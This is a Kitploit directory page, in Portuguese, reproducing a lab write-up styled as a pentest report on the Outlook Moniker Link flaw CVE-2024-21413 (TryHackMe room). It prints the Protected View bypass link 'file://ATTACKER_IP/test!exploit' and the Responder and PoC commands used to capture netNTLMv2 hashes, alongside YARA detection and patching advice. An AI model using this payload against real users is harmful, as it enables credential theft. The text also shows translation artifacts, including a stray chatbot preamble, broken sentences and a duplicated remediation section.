Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — Em 13 de fevereiro de 2024, a Microsoft divulgou uma vulnerabilidade de segurança grave no Microsoft Outlook, que recebeu o identificador CVE-2024-21413, conhecida como Moniker Link Vulnerability. A vulnerabilidade permite que um atacante contorne o mecanismo Protected View do Outlook. | Kitploit
Ferramentas/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoSegurança de EmailLabs e Prática
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Ver Repositório
7há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Em 13 de fevereiro de 2024, a Microsoft divulgou uma vulnerabilidade de segurança grave no Microsoft Outlook, que recebeu o identificador CVE-2024-21413, conhecida como Moniker Link Vulnerability. A vulnerabilidade permite que um atacante contorne o mecanismo Protected View do Outlook.

Compartilhar

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Em 13 de fevereiro de 2024, a Microsoft divulgou uma vulnerabilidade de segurança grave no Microsoft Outlook, identificada como CVE-2024-21413, conhecida como Moniker Link Vulnerability. A vulnerabilidade permite que um atacante contorne o mecanismo Protected View do Outlook image

Excelente 👍 A seguir está tradução completa + redação como relatório de Penetration Testing (PT), em hebraico profissional e claro. Como você pediu – apenas tradução e redação. As respostas, capturas de tela e complementos você adicionará, e se quiser depois – eu ajudo.


Relatório de Penetration Testing

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Resumo Executivo (Executive Summary)

Em 13 de fevereiro de 2024, a Microsoft divulgou uma vulnerabilidade de segurança grave no Microsoft Outlook, que recebeu o identificador CVE-2024-21413, conhecida como Moniker Link Vulnerability.

A vulnerabilidade permite que um atacante contorne o mecanismo Protected View do Outlook por meio de um link especial (Moniker Link) e faça o cliente Outlook da vítima para um servidor controlado pelo atacante – sem execução de arquivo e sem aviso de segurança eficaz.

enviar credenciais de autenticação (hash NTLM)

A vulnerabilidade pode levar ao vazamento de credenciais e também existe a possibilidade teórica de execução remota de código (RCE).


📌 Detalhes da Vulnerabilidade

ParâmetroValor
Identificador da vulnerabilidadeCVE-2024-21413
Data de publicação13 de fevereiro de 2024
Pesquisador responsávelHaifei Li – Check Point Research
ImpactoVazamento de credenciais + RCE potencial
GravidadeCrítica
Complexidade do ataqueBaixa
Pontuação CVSS9.8
Link oficialhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versões Afetadas

A vulnerabilidade afeta as seguintes versões:

  • Microsoft Office LTSC 2021 – a partir da versão 19.0.0
  • Microsoft 365 Apps for Enterprise – a partir da versão 16.0.1
  • Microsoft Office 2019 – a partir da versão 16.0.1
  • Microsoft Office 2016 – antes da versão 16.0.5435.1001

🎓 Objetivos de Aprendizado (Learning Objectives)

  • Entender como a vulnerabilidade funciona
  • Conhecer o mecanismo Protected View do Outlook
  • Explorar a vulnerabilidade para vazamento de credenciais
  • Medidas de detecção (Detection)
  • Recomendações de mitigação (Mitigation)

(Descrição da Vulnerabilidade)

image

O Microsoft Outlook permite exibir e-mails em formato HTML e analisar links de vários tipos, como http:// e https://. Além disso, o Outlook também oferece suporte a links especiais chamados Moniker Links, que permitem a execução de aplicativos ou o acesso a recursos externos do sistema operacional.

Em condições normais, quando um e-mail contém um link que executa um aplicativo externo ou acessa um recurso do sistema (como um link file://), o mecanismo de segurança Protected View do Outlook é ativado. Esse mecanismo exibe um aviso de segurança e bloqueia ações perigosas, como execução de código, macros ou acesso a recursos de rede externos.

No entanto, foi encontrada uma vulnerabilidade no Outlook (CVE-2024-21413) que permite contornar o mecanismo Protected View por meio de uma simples manipulação de um link do tipo Moniker Link.

O que encontramos (Findings)

Durante o teste, foi constatado que o uso de um link comum do tipo:

file://ATTACKER_IP/test

faz com que o Outlook tente acessar um recurso de rede por meio do protocolo SMB, mas essa tentativa é bloqueada pelo Protected View.

Por outro lado, quando o link inclui o caractere especial ! e uma string de texto adicional, por exemplo:

file://ATTACKER_IP/test!exploit

o Outlook não ativa o Protected View e realiza uma tentativa de conexão ao servidor remoto.

Durante essa tentativa:

O Outlook tenta acessar o recurso via SMB

Uma solicitação de autenticação automática é realizada

As credenciais de autenticação do usuário são enviadas ao atacante

O hash netNTLMv2 do Windows da vítima é capturado

É importante observar que o compartilhamento remoto não precisa existir de fato, pois a tentativa de autenticação é realizada de qualquer forma.

Impacto (Impact)

A vulnerabilidade permite que o atacante:

Vazamento de credenciais do usuário (hash netNTLMv2)

Execução de ataques offline (Cracking / Pass-the-Hash)

Movimentação lateral na rede corporativa

Além disso, como os Moniker Links usam o mecanismo COM (Component Object Model) do Windows, existe a possibilidade teórica de execução remota de código (RCE). No entanto, até a data do teste, não há Proof of Concept público para a realização efetiva de RCE por meio dessa vulnerabilidade.

Exploração da vulnerabilidade (Exploitation)

No âmbito do ataque, um e-mail contendo um Moniker Link semelhante ao apresentado na tarefa anterior é enviado à vítima. O objetivo do atacante é criar um e-mail com um link Moniker Link que contorne o mecanismo Protected View do Outlook, de modo que, quando a vítima clicar no link, seu cliente Outlook tente carregar um arquivo da máquina do atacante. Essa ação faz com que o hash netNTLMv2 da vítima seja enviado e capturado pelo atacante.

Antes de executar o ataque, revisaremos um Proof of Concept (PoC) criado para demonstração (e também disponível no GitHub).

Autor: CMNatic | https://github.com/cmnatic Versão: 1.0 | 19/02/2024

O código usa a linguagem Python e envia um e-mail HTML contendo um link Moniker Link malicioso.

Descrição do PoC

O PoC:

Recebe um endereço de e-mail do atacante e um endereço de e-mail da vítima

Requer uma senha para autenticação SMTP (neste quarto, a senha para [email protected] é: attacker)

Contém o conteúdo HTML do e-mail (html_content) com um link Moniker Link malicioso

Define os campos do e-mail: Subject, From, To

Envia o e-mail por meio do servidor de correio

Em um cenário real, é necessário um servidor SMTP controlado pelo atacante (neste quarto, o servidor já é fornecido).

Escuta para captura de Hash – Responder

Após o envio do e-mail, é necessário executar uma ferramenta de escuta do tipo Responder na máquina do atacante para capturar solicitações SMB.

No THM AttackBox, o nome da interface é ens5:

responder -I ens5

O Responder escuta solicitações SMB, LLMNR e NBT-NS e permite capturar credenciais de autenticação.

Abertura da máquina da vítima

Abra a máquina da vítima pela janela de split-screen

Inicie o Outlook

Selecione a opção "I don't want to sign in or create an account"

Feche a janela de inserção da chave do produto

A caixa de correio da vítima já está configurada previamente

Execução do Exploit

No AttackBox:

Crie um novo arquivo chamado exploit.py

Cole o código do PoC nele

Antes da execução, é necessário fazer ajustes:

Atualizar o endereço IP da máquina do atacante dentro do Moniker Link (linha 12)

Substituir o valor MAILSERVER pelo endereço:

10.64.165.67

Em seguida, execute:

python3 exploit.py

Quando for solicitado a inserir a senha, insira:

attacker

Se a operação for bem-sucedida, a mensagem será exibida:

Email delivered

Resultado

Após abrir o e-mail na máquina da vítima e clicar no link "Click me":

O Outlook tenta se conectar à máquina do atacante via SMB

O Responder captura a tentativa de autenticação

O hash netNTLMv2 do usuário é capturado com sucesso

O ataque foi concluído com sucesso.

image

Detecção

YARA

Foi criada uma regra YARA por Florian Roth com o objetivo de identificar e-mails que contêm o elemento file:\ dentro de um Moniker Link — algo que pode indicar uma tentativa de exploração do CVE-2024-21413.

Exemplo da regra YARA (conforme aparece no quarto):

A regra procura características gerais de e-mail (como Subject: e Received:)

E também procura um padrão suspeito de link file:// apontando para um caminho UNC (\) junto com uma extensão de arquivo comum, incluindo o caractere ! no final (característica do bypass do Protected View)

(O código em si permanece como no original)

Wireshark

Além disso, é possível ver a solicitação SMB que sai da máquina da vítima para a máquina do atacante em um Packet Capture no Wireshark.

Durante a solicitação:

É realizada uma tentativa de autenticação SMB

É possível identificar um hash do tipo netNTLMv2 (às vezes truncado)

Remediação

Prevenção e Hardening (Remediation)

A Microsoft incluiu atualizações de segurança para corrigir esta vulnerabilidade nas atualizações de Patch Tuesday de fevereiro. É possível consultar a lista de artigos de KB relevantes por versões do Office no link oficial da Microsoft.

É altamente recomendável atualizar o Microsoft Office por meio de:

Windows Update

Microsoft Update Catalog

Além disso, até que as atualizações sejam concluídas em todos os sistemas, isso é um lembrete importante para aplicar práticas básicas de segurança da informação e, em particular, aumentar a conscientização dos usuários, como:

Não clicar em links aleatórios, especialmente de e-mails inesperados

Visualizar a prévia dos links antes de clicar

Encaminhar e-mails suspeitos ao responsável pela segurança da informação na organização

Como esta vulnerabilidade contorna o mecanismo Protected View do Outlook, não é possível configurar o Outlook para bloquear esse ataque somente com alterações de configuração.

Além disso, o bloqueio total do protocolo SMB não é recomendado na maioria das organizações, pois o protocolo é essencial para o acesso a recursos de rede e compartilhamentos de arquivos. No entanto, é possível implementar bloqueios ou restrições no nível do Firewall, dependendo da política organizacional e da estrutura da rede.

Prevenção e Hardening (Remediation)

A Microsoft incluiu correções de segurança para esta vulnerabilidade nas atualizações de Patch Tuesday de fevereiro. É possível consultar a lista de artigos de KB relevantes de acordo com a versão do Office no link oficial da Microsoft. É altamente recomendado atualizar o Microsoft Office por meio de:

Windows Update

Microsoft Update Catalog

Além disso, até que as atualizações sejam implementadas em todos os sistemas, isso é um lembrete importante para aplicar práticas básicas de segurança da informação e, em particular, aumentar a conscientização dos usuários, como:

Evitar clicar em links aleatórios, especialmente de e-mails inesperados

Verificar o endereço do link (Preview) antes de clicar

Encaminhar e-mails suspeitos ao responsável pela segurança da informação na organização

Como esta vulnerabilidade contorna o mecanismo Protected View do Outlook, não é possível impedir o ataque por meio de alterações de configuração no próprio Outlook.

Além disso, o bloqueio total do protocolo SMB não é recomendado na maioria das organizações, pois o protocolo é essencial para o acesso a compartilhamentos de arquivos e recursos de rede. No entanto, é possível implementar restrições ou bloqueios no nível do Firewall, dependendo da política de segurança e da estrutura da rede corporativa.

Baixar ferramenta